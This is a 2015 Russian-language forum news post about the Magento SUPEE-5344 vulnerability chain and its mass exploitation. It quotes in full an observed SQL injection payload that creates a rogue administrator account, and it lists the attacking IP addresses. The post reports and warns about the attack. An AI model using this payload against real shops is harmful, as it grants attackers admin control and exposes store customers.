Уязвимость в CMS Magento: пострадали 98 000 интернет-магазинов

Тема в разделе "Мировые IT новости", создана пользователем Amazko, 26 апр 2015.

  1. Amazko

    Amazko Ловлю сливеров.

    Moderator
    Регистр.:
    4 мар 2012
    Сообщения:
    569
    Симпатии:
    309
    [​IMG]
    Злоумышленники уже начали эксплуатировать исключительно опасную уязвимость SUPEE-5344, которая присутствует почти в 100 000 интернет-магазинах, работающих на системе управления контентом Magento.

    Magento считается самой популярной CMS для интернет-магазинов. Разработчики выпустили патчещё в феврале, но до сих пор большое количество торговых площадок не установили его, как это часто бывает. Многие владельцы магазинов просто не знают, что подвергают опасности и себя, и своих пользователей.

    О проблеме рассказал голландский хостер Byte, который размещает много сайтов на платформе Magento. Они уже наблюдали использование эксплоита для Magento версий Community и Enterprise.

    Информацию подтверждают коллеги из Sucuri. Они говорят, что обнаруженный ими эксплоит осуществляет только одну функцию: создаёт фальшивый админский аккаунт в базе данных Magento.

    popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);

    SET @SALT = “rp”;

    SET @PASS = CONCAT(MD5(CONCAT( @SALT , ‘123’) ), CONCAT(‘:’, @SALT ));
    SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;

    INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (‘Firstname’,’Lastname’,”email@example.com”,’ypwq‘,@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());

    INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,’U’,(SELECT user_id FROM admin_user WHERE username = ‘ypwq’),’Firstname’); –


    «Уязвимость на самом деле состоит из цепочки нескольких уязвимостей, которые в итоге позволяют неавторизованному пользователю запустить PHP-код на сервере», — объясняетНетанель Рубин (Netanel Rubin) из компании Check Point. В частности, используются уязвимости CVE-2015-1397, CVE-2015-1398 и CVE-2015-1399. На сопровождающем видео специалисты Check Point показывают, как заказать дорогие наручные часы, используя SUPEE-5344.

    По информации Incapsula, атаки начались в понедельник с IP-адресов 62.76.177.179 и 185.22.232.218 (оба российские).
     
    Sorcus нравится это.